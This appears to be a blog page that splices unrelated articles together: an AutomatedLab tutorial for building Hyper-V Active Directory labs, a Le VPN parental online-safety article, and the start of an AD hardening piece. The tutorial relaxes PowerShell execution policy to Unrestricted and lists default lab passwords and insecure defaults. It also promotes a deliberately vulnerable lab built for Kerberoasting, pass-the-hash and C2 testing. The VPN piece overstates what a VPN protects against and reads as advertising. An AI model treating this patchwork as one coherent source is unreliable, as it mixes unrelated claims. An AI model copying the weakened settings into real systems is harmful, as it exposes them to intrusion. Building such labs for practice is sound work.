Install-PackageProvider Nuget -Force
Install-Module AutomatedLab -AllowClobber

# If you are on Linux and are not starting pwsh with sudo
# This needs to executed only once per user - adjust according to your needs!
Set-PSFConfig -Module AutomatedLab -Name LabAppDataRoot -Value /home/youruser/.alConfig -PassThru | Register-PSFConfig

# Prepare sample content - modify to your needs

# Windows
New-LabSourcesFolder -Drive C

# Linux
Set-PSFConfig -Module AutomatedLab -Name LabSourcesLocation -Value /home/youruser/labsources -PassThru | Register-PSFConfig
New-LabSourcesFolder # Linux

From MSI

AutomatedLab (AL) is a bunch of PowerShell modules. To make the installation process easier, it is provided as an MSI.

Download Link: https://github.com/AutomatedLab/AutomatedLab/releases

There are not many choices when installing AL.


The options Typical and Complete are actually doing the same and install AL to the default locations. The PowerShell modules go to “C:\Program Files\WindowsPowerShell\Modules”, the rest to “C:\LabSources”.

As LabSources can grow quite big, you should go for a custom installation and put this component on a disk with enough free space to store the ISO files. This disk does not have to be an SSD. Do not change the location of the modules unless you really know what you are doing.


Very important to AL is the LabSources folder that should look like this:


If all that worked, you are ready to go.

Demo: See the power of AutomatedLab!

With AutomatedLab set up , try running the following PowerShell script with administrator privileges.

New-LabDefinition -Name Lab1 -DefaultVirtualizationEngine HyperV

Add-LabMachineDefinition -Name DC1 -Memory 1GB -OperatingSystem 'Windows Server 2019 Standard Evaluation (Desktop Experience)' -Roles RootDC -DomainName contoso.com
Add-LabMachineDefinition -Name Client1 -Memory 1GB -OperatingSystem 'Windows 10 Enterprise Evaluation' -DomainName contoso.com


Show-LabDeploymentSummary -Detailed

Doing this will create a Win 10 virtual machine on Hyper-V .

In just four lines, Windows Server and Windows10 are installed, Active Directory is built, and the client Windows10 is domain- joined.
How exciting!


Let’s set it up right away. Unfortunately, machine specs are required to run virtual machines . You will also need to download the Operating System ISO file, so it might take some time for those who start from scratch and it highly depends on your internet speed.


You need plenty of memory, storage, and processor. You need an environment where you can run multiple virtual machines at the same time.
At least 8GB of memory, depending on the virtual machines running at the same time. 16GB or 32GB is recommended depending on the number of virtual machines you are ging to create.

With storage as SSD, especially with NVMe SSD , the build time will be very fast.

Next step…

Keep the following enabled.
· BIOS on the screen Intel VT-X / AMD Enabling -V
· Windows Add in the deletion of features Hyper-V enabled related functions

VMWare for collisions with other virtualization software such as VMWare WorkStation is at 2004 Windows10 Hyper-V supports the platform.
If you want to use it in parallel, please update to Windows10 2004. Before 2004, you have no choice but to uninstall the virtualization software.
VirtualBox also seems to be compatible with the Hyper-V platform.


Install AutomatedLab
Start Powershell with administrator privileges and execute the following command.
Note: installation using msi may not be able to install all the necessary modules, so I do not recommend it.

Install-Module AutomatedLab -Force -AllowClobber

If you don’t have NuGet on your computer, you’ll be prompted to install NuGet, so follow the instructions to install it.

Installing LabSources Once
Once AutomatedLab is installed, install LabSources. LabSources are the folders where Labs are located.

> New-LabSourcesFolder

* If you want to install on another drive, specify with -DriveLetter.
(e.g “-Drive Letter D” etc.)

Getting an error  when executing an Automated Lab command

When you try to execute the Automated Lab command including this command, the following error may occur.

The’New-LabSourcesFolder’command was found in module’AutomatedLab’, but this module could not be loaded.

This is due to Powershell ‘s security enforcement policy, and there are two ways to resolve it.
1.  Permanently relax the execution policy
2.  Temporarily relax the execution policy by specifying the “-Exec bypass” option every time the Powershell window is executed.  * In this case, it is necessary to execute “Import-Module Automated Lab” every time when using AL.

The execution policy can be changed temporarily at the time of execution as shown in option 2, but when creating a lab configuration with Powershell ISE in the future , if you chose option 2, it will be blocked by the execution policy and execution will not be possible, so choose option 1.

Set-ExecutionPolicy Unrestricted

* Execute with administrator privileges

If you are concerned about security, return to the Restricted policy when you no longer use AL.

Whether to send diagnostic information when AutomatedLab is executed for the first time.

When you execute it for the first time, you will be asked the following questions.

Opt in to telemetry?

Whether to send diagnostic information. Please choose either Yes or No.

Download ISO file

AL is available if your ISO image contains a configuration file named install.wim. ISO files such as Windows 10 Pro downloaded using the
Windows Media Creation Tool do not contain wim files and cannot be used as is. The trial version of the ISO file includes install.wim, which you should use for verification purposes.

The trial version ISO file for each OS is as follows.

Windows Server 2019
Windows 10 Enterprise

Please prepare the English version (US) for all of these . The architecture is free, but this time we will use x64.
* You need to enter your name, company name, and phone number to download the ISO file.

After downloading the ISO file, place it in the ISOs folder inside the AL LabSources folder.
The LabSources folder is created directly under the C drive by default.

After deployment, use the Get-LabAvailableOperatingSystem command in Powershell to make sure the ISO file is recognized.

PS C:\WINDOWS\system32> Get-LabAvailableOperatingSystem |ft OperatingSystemImageName
20:30:25|00:48:57|00:48:57.052| Scanning 2 files for operating systems
Found 5 OS images.
Windows 10 Enterprise Evaluation
Windows Server 2019 Standard Evaluation
Windows Server 2019 Standard Evaluation (Desktop Experience)
Windows Server 2019 Datacenter Evaluation
Windows Server 2019 Datacenter Evaluation (Desktop Experience)

This completes the basic setup.

Let’s create our lab

Time required: 10-20 minutes (depending on machine specifications)

Since Sample Scripts exist in LabSources, you can understand the general method by looking at them.
Tutorials  on Github Wiki can help you.

In addition, the extensive documentation can be found at the following URL. However, it seems that it is not the latest, so be careful.
(For the latest information, you can only use Get-Help or read the code in the repository )

Let’s install Windows Server 2019.
First , run Windows Powershell  with administrator privileges.
Next, copy and paste the following commands to a text editor and save it as ps1 file.

# Declaration to create a lab called TestLab # Everything you 
set from now on is applied by executing the "Install-Lab" command 
# Default Virtualization Engine is Hyper-V. This is a required option. 
New-LabDefinition -Name TestLab -DefaultVirtualizationEngine HyperV

## Create a machine for Windows Server 2019 
# Powershell can split long command columns into multiple lines by putting a backticks (`) at the end. 
# -OperatingSystem: 
Add-LabMachineDefinition using the name of OperatingSystemImageName that appears in OperatingSystem `
 -Name ws2019 `
 -Memory 2GB `
 -OperatingSystem 'Windows Server 2019 Standard Evaluation (Desktop Experience)'

#Apply and create lab settings 

#Show deployment results 
Show-LabDeploymentSummary -Detailed

The edition is the same for both Standard and Datacenter as long as it is a trial version. If you want to use it for commercial use, it is best to use the Datacenter option in case you purchase a license.

Execute the script .

Once executed, the lab will start building.

Since the base image is created for each OS, it will take some time for the first time. The second and subsequent times are much faster.

After a while, the process will complete and you will see the Show-LabDeploymentSummary results.

If the account name and password are not specified when defining the machine, the information defined by default will be used.
As shown in the Summary, the administrator account is set to “Administrator” and the password is set to “Somepass1” by default.
The network settings are similar, by default a network with a subnet of / 24 is created to avoid conflicting with the host’s network in the range
You are not connected to the internet with this setting, but you can connect to your machine and do a lot of things.

Connect to the lab machine

Type the following commands at the shell prompt at the bottom of PowerShell ISE. You may want to keep the command window closed, as the command window on the right side of the screen may steal keyboard input.

RDP connection

You can use the Connect-LabVM command to make an RDP connection.

> Connect-LabVM ws2019

Enter “Administrator” as the user name and “Somepass 1″ as the password.

You can also use ” Remote Desktop Connection” (mstsc) directly. If you hit it on the command line :

> mstsc /v:ws2019
Establish a Powershell session with our lab machine

The lab machine has WinRM enabled by default, so PSSession is available.
By using Enter-LabPSSession, AL will use your credentials to establish the session.

> Enter-LabPSSession ws2019

[ws2019]: PS C:\Users\Administrator\Documents> whoami
Have your lab machine run Powershell cmdlets

Let’s make sure that Invoke -LabCommand can execute arbitrary code.

> Invoke-LabCommand -ComputerName ws2019 -ScriptBlock {Write-Host (whoami)}
19:21:19|00:03:09|00:00:00.000| Executing lab command activity: '<unnamed>' on machines 'ws2019'
19:21:19|00:03:09|00:00:00.009| - Waiting for completion
19:21:29|00:03:19|00:00:10.159| - Activity done

Invoke -LabCommand can specify a lab machine and use ScriptBlock to execute arbitrary PS code and OS commands. This time, the whoami command is output as standard output using the Write-Host cmdlet.
It’s not very useful at this point, but it’s sometimes used for post-processing after lab installation.

Create a domain environment

・Time required: 30-40 minutes

Next, based on “04 Single domain-joined server.ps1” in the Introduction folder of SampleScripts, create and build a script that installs Windows Server 2019 and sets the domain environment . This time we’ll set the domain administrator password with Add-Lab Domain Definition.

Paste the following script into PowerShell ISE and run it. Or you can paste it in a text editor and save it as filename.ps1 then run it on Powershell.
* It looks long, but most of them are comments (Tips).

# Delete if Lab already exists 
# Machine namespace is common to all labs, so be careful not to duplicate if you create while keeping the existing lab. 

# Declaration to create a lab called TestDomainLab 
#Everything you set from now on is applied by executing the "Install-Lab" command 
# Default Virtualization Engine is Hyper-V. This is a required option. 
New-LabDefinition -Name TestDomainLab -DefaultVirtualizationEngine HyperV

#Since DomainName is used on multiple machines, make it a variable. 
$TestDomain = 'al.corp' 

## Domain admin user information. 
$DomainAdminUser = "aladmin" 
$DomainAdminPassword = "[email protected]!"

## Set the user account at the time of OS installation for lab construction (local user). 
# Set-LabInstallationCredential is common within the lab. Overwriting is possible on the way. 
#For domain controllers, both Set-LabInstallationCredential and Add-LabDomainDefinition must match with the same information. 
# However, if you do so, you will have a "local administrator account" with the same information as the domain administrator account on a machine other than DC. 
#Therefore, when building a proper lab, kitting with the -InstallationUserCredential option of Add-LabMachineDefinition other than DC. #It is better to specify a local user separately. 
Set-LabInstallationCredential -Username $DomainAdminUser -Password $DomainAdminPassword

#Set domain administrator account 
Add-LabDomainDefinition -Name $TestDomain -AdminUser $DomainAdminUser -AdminPassword $DomainAdminPassword

## Create a domain controller 
# Powershell can split long command columns into multiple lines by putting a backticks (`) at the end. 
# -Roles: Specify a variable that indicates the role of the machine. Various settings are required for DC and SQL Server, but AL #predefines most of the settings in the form of Role. 
# Single or forest root domain controllers use the RootDC role. 
#See the About Roles section of the documentation for a list of # Roles. 
# -DomainName: Domain name. This time we tried to name it after Automated Lab. If you want to belong to the same domain, make each machine the same Domain Name. 
# This OS is not a desktop experience. This is recommended if you want to make the installation lighter.

Add-LabMachineDefinition `
-Name DC1 `
-Memory 2GB `
-OperatingSystem 'Windows Server 2019 Standard Evaluation' `
-Roles RootDC `
-DomainName $TestDomain

## the Windows10 machine is a client created (setup person who was in fact the client also WS2019 is fast) 
Add-LabMachineDefinition -Name Client1 -Memory 2GB -OperatingSystem 'Windows 10 Enterprise Evaluation' -DomainName $TestDomain

#Apply and create lab settings 

# Show deployment results 
Show-LabDeploymentSummary -Detailed

As you can see in the comments, the Install-Lab command starts the creation. You can change the configuration as much as you want.
If possible, it’s more time-efficient to fix the configuration over and over, then add Install-Lab at the end and run it, rather than repeating a time-consuming deployment each time. There are many things you can’t understand until you try it, so let’s make it with scrap and build before you get used to it.

As a result, it took about 30 minutes.

As I wrote in the comment of the script , due to the influence of Set-LabInstallationCredential, Client1 has a local administrator with the same information as the domain administrator account.
To avoid this, set up a local administrator account for kitting in the Add-LabMachineDefinition option.

The client also belongs to the al.corp domain .

Domain Admins also includes the “aladmin” configured in the build script .

[DC1]: PS C:\Users\aladmin\Documents> net group "Domain Admins" /domain
Group name     Domain Admins
Comment        Designated administrators of the domain


Administrator aladmin                  
The command completed successfully.

It took a while to set up the domain and set up Windows 10, but it ‘s very easy to set up two machines from scratch and wait just 30 minutes for the domain to be set up with a cup of coffee.
Let’s check using Enter-LabPSSession and Connect-LabVM Commands.

What are the settings such as user account? → Let’s do our best

Unfortunately, AL covers the automatic setup of the machine for the sake of brevity.
After building the machine, I will do my best to write PowerShell for additional setup such as user accounts, group additions, and group policies .
User accounts can be easily added using the New-ADUser cmdlet on the domain controller.

Post Installation Activity

AL has a “PostInstallationActivity” function that automatically executes a script in the virtual machine after building the virtual machine . PostInstallationActivity can be described in the definition options for each machine. Create a TestLab folder in C:\LabSources\PostInstallationActivities and save the following script as PrepareDomain.ps1 in the TestLab folder.

Start-Transcript C:\Windows\Temp\postinstall.log -append

$users = @()
$users += @{Name = "abe"; Password = "[email protected]"}
$users += @{Name = "iijima"; Password = "[email protected]"}
$users += @{Name = "usui"; Password = "[email protected]"}

ForEach ($user in $users){
   $securePassword = $user.Password | ConvertTo-SecureString -AsPlainText -Force
   New-ADUser -Name $user.Name `
             -AccountPassword $securePassword `
             -PasswordNeverExpires $true `
             -Enabled $true 

Write-Output "Useradd done."


As you can see, this is a script that puts usernames and passwords in an array and adds them to New-ADUser in turn .

I am able to manage users, groups and OUs with csv for each domain.

By default, the password complexity requirement is enabled, so if you want to set a weak password, you need to change the group policy.

Next, add the PostInstallationActivity option to the domain controller in the build script above .

$postInstallActivity = Get-LabPostInstallationActivity `
                   -ScriptFileName PrepareDomain.ps1 `
                   -DependencyFolder "C:\LabSources\PostInstallationActivities\TestLab"

# Domain Contoller
Add-LabMachineDefinition `
-Name DC1 `
-Memory 1GB `
-OperatingSystem 'Windows Server 2019 Standard Evaluation' `
-Roles RootDC `
-DomainName $TestDomain `
-PostInstallationActivity $postInstallActivity

In the $postInstallActivity variable, declare the location of the folder of the script as an option of the Get-LabPostInstallationActivity cmdlet, and build the lab again.

After installation, you can confirm that the user is properly created as shown below.


Precautions after lab creation

In my build, I’ve identified the following security concerns in the default state: If you want to build a CTF-like environment and let others do it, please deal with these in advance.

– C:. \ Unattend Xml to include authentication information of kitting user
– AutoLogon is enabled by default, due to it included password in the HKLM\SECURITY\Policy\Secrets\DefaultPassword
– local administrator is enabled using in-kitting
-WinRM enabled
– UAC disabled
– Windows Firewall disabled

What do you think?

I would be more than happy to share the joy of building scripts for automating AD labs.
I enjoyed automation and wrote a lot of build scripts and PostInstallationActivity to create a vulnerable environment like the one below that could be set up in 2 hours fully; automatically.
Wayans corp

<script src=”https://gist.github.com/jimmwayans/daa86a8260aa74351206ef55769cb772.js”></script>

You can create two forests, connect MSSQL Database Links, Kerberoastable or ASReproastable, or RDP with Pth on a Restricted Admin machine, and you can create these complex environments with AutomatedLab (and lots of PowerShell ).
It was difficult but interesting to devise so that the NTLM hash always remains on a specific machine.

There are other ways to connect the virtual machine to the Internet, but it will be long, so I will omit it here. Check the SampleScripts folder for examples of their contents.
I enjoy validating the C2 framework by putting Squid on my router machine so that I can only reach the internet via a proxy.

Finally, I will end with a collection of frequently used AL commands.


Frequently used commands

All help can be found in Read the Docs below.
Here are some frequently used commands.

Whole lab

View list of labs

Get-Lab -List 

View a list of already installed labs.
The displayed lab can import sessions with the Import-Lab command.

Lab session restoration
Import-Lab [Lab name]

Restore installed lab sessions. Required to operate the lab again after closing the PowerShell window when it was built . Lab information is imported into a
Powershell session, allowing you to stop and start machines, get information, connect, and take snapshots.

List of lab machines

View lab machine information.

Obtaining detailed information during lab installation
Show-LabDeploymentSummary -Detailed

Display all machine names and network information, including the administrator user password at the time of installation.

Lab removal

Lab machines, network adapters, etc. are all deleted.

Stop and start the machine

Stop for a while
Save-LabVM [-Name <computer name> | -All]

The argument is the computer name, but using “-All” applies all lab machines.
State such as memory is saved. When it starts, it returns to its original state.

Stop-LabVM [-Name <computer name> | -All]

The argument is the computer name, but using “-All” applies all lab machines.
A shutdown signal is sent.

Start-LabVM [-Name <computer name> | -All]

The argument is the computer name, but using “-All” applies all lab machines.

snap shot

Take a snapshot
Checkpoint-LabVM [-ComputerName <computer name> | -All] -SnapshotName <snapshot name>

The argument is the computer name, but using “-All” applies all lab machines.

  • Specify the snapshot name with Snapshotname. Required.
> Checkpoint-LabVM -All -SnapshotName InitialSetup

* If the snapshot (Checkpoint) is not displayed in either Get-LabVM Snapshot or Hyper-V Manager even after executing this, it is possible that the creation has failed due to insufficient free space. Let’s try creating it with Hyper-V Manager and check the error content obtained.

Checking the snapshot
Get-LabVMSnapshot [-ComputerName <computer name>] 

If nothing is specified, information on all lab machines will be displayed.

> Get-LabVMSnapshot

SnapshotName CreationTime       ComputerName
------------ ------------       ------------
InitialSetup 2020/08/21 0:04:06 ws2016      
second       2020/08/21 0:05:55 ws2016
Restore snapshot
Restore-LabVMSnapshot [-ComputerName <computer name> | -All] -SnapshotName <snapshot name>

The argument is the computer name, but using “-All” applies all lab machines.

  • Specify the snapshot name with Snapshotname. Required.
> Restore-LabVMSnapshot -All -SnapshotName InitialSetup

Machine connection

Establish a Powershell session with a lab machine
Enter-LabPSSession -ComputerName <computer name>

A Powershell session is established with PSRemoting . If the lab machine belongs to a domain , the authentication information will be used by the domain admins user for kitting that was used when building the lab. If it does not belong to a
domain , the local kitting user’s credentials are used.

RDP connection to lab machine
Connect-LabVM -ComputerName <computer name>

You can also use the standard Windows Remote Desktop Client (mstsc).

mstsc /v: <computer name>


Establish a PSRemoting session with any credentials
$sess = New-LabPSSession -ComputerName <computer name> -Credential <PSCredential>

You can establish a PS session with any credentials. This works well if you change the domain administrator password after installing the lab .

The lab cannot detect that the password has been changed after installation and fails to log in.

Using the return value PSSession, you can open a PS session for the lab machine as follows.

Enter-PSSession -ComputerName <Computer Name> -Session <PSSession>
File transfer (host-> lab machine)
Copy-LabFileItem -ComputerName <Computer name> -Path <Host computer source file / directory> -DestinationFolderPath <Lab machine destination folder>

Transfer files from the host computer to the lab machine.
The identification information of the administrator user at the time of lab construction is used. All files / folders are placed with read-only attributes.

File Transfer 2 (Host-> Lab Machine)
Send-File -SourceFilePath <Source file on host computer> -DestinationFolderPath <Destination folder on lab machine> -Session <PSSession>

Send-Directory -SourceFolderPath <Host computer source directory> -DestinationFolderPath <Lab machine destination folder> -Session <PSSession>

Send the file to the lab machine using any PSSession information. Effective if you change the domain administrator password
after installing the lab .

File transfer (lab machine-> host)
Receive-File -SourceFilePath <Lab source file> -DestinationFolderPath <Host computer destination folder> -Session <PSSession>

Receive-Directory -SourceFolderPath <Lab source file> -DestinationFolderPath <Host computer destination folder> -Session <PSSession>

Receive files from lab machines using arbitrary PSSession information. Effective if you change the domain administrator password
after installing the lab .


I haven’t written enough yet, but I believe that if I write this far, some people will find it useful.
Let’s make your AD verification life easier with AutomatedLab!

My Powershell script for AL: @jimmwayans

Follow me on twitter for more infosec resources: @jimmwayans


To steer clear from the internet in these days is almost impossible unless you have made a clear and conscious decision to abandon modern society and live free like like the Pokot nomads in Wes Pokot. Since the later is not only a way of life trapped in a castaway circumstance, we tend to educate ourselves about the dangers of the internet, especially in terms of parental control and child’s exposure to unwanted content.

In simple terms, we should divide certain aspects and impact of internet in modern day household to cyber safety and security, although before we even consider that, we should look at the ways to stay informed what are children drawn to on the internet, how to control or limit visitation to sites that are not appropriate for their age and upbringing or should we just resort to confidence in our superb parenting skills, hoping that would be enough? Absolutely NO!

Online Safety
Online Safety

The Cobb Schools Instructional Technology team created a Student Online Safety resource with a list of best practices for online safety.

Top 10 Cyber Safety Tips for Parents

#1 Be Informed, Up-to-Date, and Alert

Off course first and foremost we assume and we have to assume that the situation at home is stable, secure and has such quality that parents have the time to discuss and relate their views and concerns when it comes to the internet. They should be more than merely curious but also approach with caution as the “wrong attitude” can shut their kids off and thus make the most important information kept without full disclosure and that information is about what kids like to do online. Gaming, general searches, and many other things that fall under the umbrella of digital footprint should, and must be, part of this discussion.

We can also learn something from the general attitude of the great Steve Jobs, in terms of his first general rule when it comes to his own household – no computers, laptops and mobile telephones were allowed in his home thus he had found a fairly easy solution to one of the most important aspects when it comes to childe cyber security for parents – be aware how much time they spend online and how!

It is very difficult, sometimes even impossible, for parents to keep up as there are instances where parents have little or no understanding of what their kids are doing online, and even if they did, they don’t have the time to educate, listen and point them in the right direction. They merely rely on an off chance it will all be all right. Often it does not unfold that way especially in the situation where parents are under the impression that they have sufficient control over the use of filtering software and the possibility to block certain websites. The truth of the matter is quite different simply because there is so much information out there, thus, is it safe to assume, some if not all, will most definitely be getting around the simple and not appropriate and certainly not sufficient approach to parental controls.
Summing up the first point is easy to understand and can also be fun to implement. Stay connected to your kids, talk to them, learn from them and keep abreast of updates, be open to their questions and invest in that bond which is most likely to be your best tool to keep them safe and sound on and offline.

#2 Know the Tools, Risks, Rules, and Approach

There is no way around it, get early into the game, that way you will never be late with a reaction.

It is everywhere, in schools, at home, on phones, cafés, birthdays, theatre thus there should be no surprise that kids learn faster than their parents. It doesn’t matter whether the internet is used for research projects at school, in communication with the teachers and also other kids, school reports, communicate with teachers and other kids, and play interactive games.

Being surrounded with it comes at a cost which is in most cases unwanted content that they have come across by being curious and clicking on a pop-up or sidebar of YouTube videos. It also comes in more difficult scenarios like cyber-bullying, and just like any other jungle out there – online predators. Because of this, both you and your children should be aware of the significance of anonymity online. Not using your real name, and only connecting through a VPN connection will ensure that no predator would be able to pinpoint and dox (term for disclosing private information) your children and do them any harm. With Le VPN you will be able to appear like you are from another country, diminishing the chance for your child to be attacked by malicious software or spyware.

Online predators are known for impersonating a different person or a child even using software and websites where kids interact, predators may pose as a child or teen looking to make a new friend. Their scam is to get as much information from a child as they possibly can (personal information, address and phone number etc..) and that’s why our first point is of paramount importance – Parents have to be informed and stay informed in terms of what their kids see and hear on the Internet, who they meet, and what they share about themselves. Use that privilege and that wonderful bond and talk free with them but never you’re your gaze from their activities.

*Children’s Online Privacy Protection Act – Internet Safety Laws

Derived, rendered and regulated on a federal level, (COPPA) assists in the protection of children under the age of thirteen is basically when we break it down a safeguard for a parent that pertains to protection of children’s personal information which cannot be obtained without parent’s awareness and consent.

COPPA requires websites to explain their privacy policies and get parental consent before collection and/or use of a child’s personal information, (name, address, phone number, social security number, etc..) but what it also does revolves around prohibition that acts as another safeguard.

This prohibition prevents a site to collect more information than necessary in situations where a child needs to provide more personal information than necessary to play a game or enter a contest.

#3 Use Online Protection Tools

The use of online tools allows parents to have a certain degree of control of kids’ access to inappropriate adult material and helps protect their children from the Internet predators. One of the basic tools is related to Internet service providers (ISPs) that provide parent-control options. What is also available for parents is programs and/or specifically designed software that helps block access to sites and restricts personal information from being sent online. Others tend to resort to the use of programming possibilities in order to monitor and track online activity.

It is never too much to repeat and continuously point out the necessity of going back to the very basics, which entails being involved in your children’s online activities.

Never share basic personal information (address, phone number or school name or location);

Resort to the use of only a screen name and never share passwords;

Never consent or promise to meet in person with anyone you have met online without parent knowledge, approval and/or supervision.

Never respond to a threatening email, message, post, or text.

Always consort and fully inform a parent or any other close relative or trusted adult about any and all communication or conversation that was scary or hurtful.

Few very useful cyber safety tips pertaining to parental control and supervision:

  • Investing your time together online will give incentive to your children to turn to you for any question and dilemmas but more importantly educate them in terms of appropriate online behavior;
  • Positioning and choice of location might not sound relevant but are common sense and logic would suggest otherwise – while keeping the computer in a common area (where you can watch and monitor its use) you have full awareness of the time your child spends on the computer and also about his interest and choices he makes online in terms of content thus – no, the computer should not be positioned in individual bedrooms. Also worth mentioning with respect to any other device that has internet access (excluding laptop computer or a desktop computer) are portable devices like tablets and smartphones – be close enough to have the possibility to monitor the content on it visually;
  • Use bookmarks to allow your children to have easy access to favorite sites;
  • If they frequent gaming sites or sometimes certain educational websites, disable purchases and often check your credit card and phone bills for any unknown account charges.
  • Also suggest, ask and educate yourself what options and solutions are being offered by the school, after-school care, friends’ homes, or any other location where your children have access to the internet without your supervision;
  • Be alert and observe and listen to any signs or initiate your children in terms of discussion and reporting of uncomfortable online exchanges or fright from what they have seen or heard online;
  • Be vigilant in terms of any signs that would suggest your children are being targeted by an online predator by looking for answers to these types of questions:
    • Do they spend long hours online, especially at night?
    • Are they receiving phone calls from people you don’t know?
    • Whether you have noticed that unsolicited gifts are arriving in the mail?
    • Do they often suddenly turn off the computer or the sound when you walk into the room?
    • Did you notice a sudden withdrawal from family life and hesitation and/or reluctance to talk about their online activities?

But what do we do when they grow older?

It is true; they often do, so how can we maintain the same level of monitoring and supervision if they are not within our immediate reach.

It also comes naturally with age that they would like and appreciate more privacy but it also is a must to take precautions like a simple discussion in terms of sites and apps they should use in combination with their online experiences.

Alert them if you did not do so beforehand and/or already about the dangers of interaction especially when it comes to people they don’t know and point out the simple fact – nothing is exactly as it appears online – often it is not at all like that and that people online don’t always tell the truth.

Provide them with understanding and a thorough explanation with respect to the use of passwords as a safeguard against identity theft.

#4 Encourage Critical Thinking

If everything was true what we see in virtual World, we would all be flying magicians, World-renowned innovators or even have the possibility to multiply ourselves with respect to how many profiles of ourselves we actually need and can use during the day.
Offer criticism and logic, common sense and respect as a baseline of your talks with your children, but don’t forget caution and safeguards.

Teach them how to recognize and block unwanted contacts that happen by phone, email, text, social networking or online games but also alert them to the fact that they need to comprehend that what they share with the rest of the online World can be seen by others of whom they have not originally thought of or had in mind at all.

On the other hand, when it comes to their digital footprint, it could not only last forever but also if they master it well, this can assist them in the future as it would reflect their skills and creativity.

#5 Set Up Your Internet for Safe Use

We have already mentioned the use of filters and monitoring the use of internet but what you could also consider applying is to enable Google Safe Search on all the devices your household uses.

As far as what you can do within the browser itself is to enable parental controls on streaming services such as YouTube, Netflix and AppleTV but also install software that filters content or lets you choose what times devices can be used/not used as that would address the initially mentioned Steve Jobs attitude in terms of limited time spent in virtual world.

Use the options already installed like search history in their browser, know their email addresses and passwords so you can monitor activity. Many devices use cloud storage like Google Drive or Apple iCloud, to store data such as documents, photos or videos. Access to which can also be controlled.

Last but not least, educate them about GPS and checking-in functions as it identifies the location of your child when they are outside and those could be limited or permanently disabled.

The Most Unsafe Social Media Apps For Children | The Most Dangerous Social Media Apps Children Are Using | apps for parents to monitor unsafe apps for kids | dangerous apps for children | inappropriate apps for teens | social media app parental guidance | most unsafe social media apps | Le VPN

#6 Learn about Social Networks

Of course, it’s out there, and it’s huge – Instagram, Twitter, Facebook, and so many others with a similar function – to connect with other people.

Yes, it’s true having friends and connecting with others is very important to children and young people. They use it in so many ways these days whether to maintain contact with family, promote their Instagram, use WhatsApp, Snapchat or Viber to talk to friends. Surely apps that involve messaging between individuals are numerous but pose a certain degree of danger especially in situations where children are messaging people they don’t know and trust in real life.

Again, use common sense, logic, inform and educate them about the fact that messages and photos shared can be viewed and obtained by others. Teach them to use and set privacy settings to ensure that their profile is only seen by people they know, and check these settings often.

Teach them how to report abuse or inappropriate content to the social networking service or other agency especially when it comes to inappropriate content. Make sure children and young people understand the risks of sending or forwarding sexual texts, images or videos (sexting) and the harm this can cause to themselves and others.

The truth is that they need to know. They need to know your views on things and your perspective and also rationale behind it. It will make them safe and it will make parents rest assured their child is well informed as they have no control over what happens to the image or who sees it, even if they only send it to a friend. Sending sexual images of themselves or others under 18 years could also be classed as possessing and distributing child pornography. This can have serious consequences.

#7 Understand Games and Apps

Games and apps are initially designed to be educational tools that build skills and a sense of achievement, as well as being lots of fun. They can be downloaded from the internet and many are free. Even young children can spend a lot of time playing them.

The best apps are those where children can experiment and try out their own ideas, creating drawings or music. Some apps are less educational but are not much more than repetitive activities. Free apps often have a lot of advertising and in-app purchasing. These can be real purchases and cause ‘’bill-shock’’ for parents. It is also hard for young children to tell the difference between advertising and the game.

One of the first things a parent should do is make sure there is no inappropriate content, violence, sexual images, coarse language or gambling.

Most parents would never encourage their children to gamble. However, simulated gambling may be embedded in children’s games without parents even beginning to realize it.

Exposure to simulated gambling at a young age can make it more likely that children will gamble when older. They can think that gambling is based on skills rather than chance. They often believe the more they play – the better they will get, just as they do in other games. This is reinforced when games make it easier to win than in real-life gambling.

What can be done about it is again education, discussion, use of common sense and logic and always investing time in explaining things to them. Help them recognize gambling and understand how it works but also avoid gambling in front of children and not engage in gambling activity as a family.

#8 Understand Online Violence

Parents should nurture the bond with their children and always lead by example which includes not playing violent games in front of children. Children are quick to spot double standards. You may need to be firm when limiting violent games as some children like these the most.

While a connection between playing violent games and being violent is proven to be false, the graphic nature and adult themes might still create an emotional response with your child, inducing nightmares, fears, and anxiety.

Young people often enjoy multi-player online games. They can play with friends and meet new people with similar interests anywhere in the world. In those instances, parents should remind their children to be cautious about sharing personal information, monitor when they play. Some games happen in different time zones, which can mean young people are playing when they should be sleeping.

When children and young people spend a lot of time playing games they spend less time doing slower, more demanding tasks like reading or doing homework.

#9 Trust, Invest Time, Monitor, and Educate

Rather than sounding like a broken record, try to sense when it’s a good time to approach and talk to your children. The result will be rewarding in a form of assurance that they would not make an uninformed decision that might impact their life or your own.

Cyber Safety Advice Checklist for Your Children:

  • Avoid posting personal information.
  • Once you post something, it’s no longer yours and other people can see it.
  • Keep your privacy setting tight and updated.
  • Never share passwords with friends or strangers.
  • Only add people to your networks that you already know.
  • Don’t meet people in person that you met online.
  • Inform your parents or guardian about anyone that suggested a meeting.
  • Not everyone is honest, so they may not be who they say they are.
  • Respect other people even if you disagree with their opinions.
  • Always be polite.
  • Only use the internet when you are around trusted adults.
  • If you see something online that makes you feel unsafe, uncomfortable, scared or worried, leave the site instantly and shut down the device and talk to a trusted adult immediately.

#10 Practice What You Preach

Parents often see their children the same way as when they were born, helpless bundles, which will never understand on their own. This is very far from the truth.

Children understand as much, and in this case sometimes more, than adults. They will see that you are using your real name on social media, that you are playing games, and that you are not careful with your private information and IP. This will make them lose confidence in you and stop listening.

If you have chosen to use a VPN provider for your child’s device, use it on your own too. Le VPN offers 5 simultaneous connections on multiple devices, and it will make you safer. Having sincere discussions with your children about safety, security, and prudence is something that you can do even with a very young child, as they will appreciate you talking to them like an equal.


The internet is a marvelous place, and your children will enjoy both the risks and the benefits of it sooner or later. Starting off early and teaching both yourself and your children about the internet will make all of you more aware of the risks and more knowledgeable on the ways you can use the benefits.

Using a VPN provider, such as Le VPN, will provide you with anonymity, but that is just the first step. Similar to traveling the world, you need to know the rules and the tools, as to make your stay as good as digitally possible.


Credit: https://www.le-vpn.com


Security Hardening & Auditing for Active Directory

A quick summary of Active Directory to get us started. Active Directory is a Microsoft product which runs several services on a Windows server to manage user permissions and access to networked resources. It stores data as objects – which can be users, groups, applications or devices. These are further defined as either resources – such as printers or computers, or security principals – such as users or groups.

From the above, you will understand just how important it is to secure your Active Directory properly. This can be done in a number of ways including hardening, auditing and detection rules.

The first step you should take is hardening your active directory against known attacks and following best practices. There are a lot of great articles out there to follow, starting with the official guide from Microsoft, found here. This contains important topics such as reducing the attack surface, audit policy recommendations and implementing least privilege administrative models.

Next up, activedirectorypro, which details 25 best practices to follow to secure your Active Directory. This contains tips on securing domain admins, local administrators, audit policies, monitoring AD for compromise, password policies, vulnerability scanning and much more.

